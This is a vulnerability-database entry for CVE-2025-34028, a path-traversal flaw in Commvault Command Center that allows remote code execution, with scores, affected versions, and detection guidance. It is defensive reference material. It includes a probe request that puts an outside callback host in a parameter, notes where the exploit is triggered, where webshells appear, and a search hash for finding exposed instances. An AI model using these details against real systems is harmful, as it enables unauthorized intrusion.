cbcvebase.
CVE-2025-34028
published 2025-04-22

CVE-2025-34028: The Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files that represent install packages that, when expanded by the…

PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-05-23
Exploited in the wild
EPSS
97.16%
99.9th percentile
The Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files that represent install packages that, when expanded by the target server, are vulnerable to path traversal vulnerability that can result in Remote Code Execution via malicious JSP. This issue affects Command Center Innovation Release: 11.38.0 to 11.38.20. The vulnerability is fixed in 11.38.20 with SP38-CU20-433 and SP38-CU20-436 and also fixed in 11.38.25 with SP38-CU25-434 and SP38-CU25-438.

Affected

2 ranges
VendorProductVersion rangeFixed in
commvaultcommand_center_innovation_release11.38.0 – 11.38.25
commvaultcommvault>= 11.38.0 < 11.38.2011.38.20

Detection & IOCsextracted from sources · hover to see the quote

url/commandcenter/deployWebpackage.do
url/commandcenter/deployServiceCommcell.do
path/reports/MetricsUpload/*.jsp
otherfofa-query: icon_hash="1209838013"
commandPOST /commandcenter/deployWebpackage.do HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded commcellName={{interactsh-url}}&servicePack={{string}}&version=x
  • Detect unauthenticated POST requests to /commandcenter/deployWebpackage.do with body parameters commcellName, servicePack, and version — the SSRF/RCE entry point. Path traversal sequences in servicePack parameter (e.g., ../ or URL-encoded equivalents) are the exploit trigger.
  • Detect unauthenticated POST requests to /commandcenter/deployServiceCommcell.do uploading a ZIP file (magic bytes PK) with a multipart body containing a servicePack field with path traversal sequences and a file field with a .zip filename.
  • Post-exploitation webshell access is indicated by HTTP requests to URIs matching /reports/MetricsUpload*.jsp — monitor for .jsp file access under this path following any exploit attempt.
  • The Nuclei probe checks for HTTP 900 status code in response to the SSRF probe against /commandcenter/deployWebpackage.do — status code 900 is a strong indicator of a vulnerable Commvault instance.
  • Use FOFA icon hash 1209838013 to identify internet-exposed Commvault Command Center instances for asset discovery and attack surface monitoring.
  • The X-Requested-With: XMLHttpRequest header is present in exploit requests to /commandcenter/deployWebpackage.do — include this in detection logic to reduce false positives.
  • ·The Snort/ET rules for deployServiceCommcell.do (sid:2061838) and deployWebpackage.do (sid:2061837) require TLS decryption (tls_state TLSDecrypt) to be effective against HTTPS traffic — blind spots exist on encrypted sessions without TLS inspection.
  • ·The post-exploitation webshell rule (sid:2061839) uses an xbits:isset check tied to prior exploit detection (ET.CVE-2025-34028) — it will only fire if the initial exploit attempt was also detected in the same session tracking window (120 seconds). Standalone webshell access without a preceding detected exploit will be missed.
  • ·The vulnerability affects only Command Center Innovation Release versions 11.38.0 through 11.38.20; fixed versions are 11.38.20 with SP38-CU20-433/SP38-CU20-436 and 11.38.25 with SP38-CU25-434/SP38-CU25-438 — detections should be scoped to unpatched instances.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.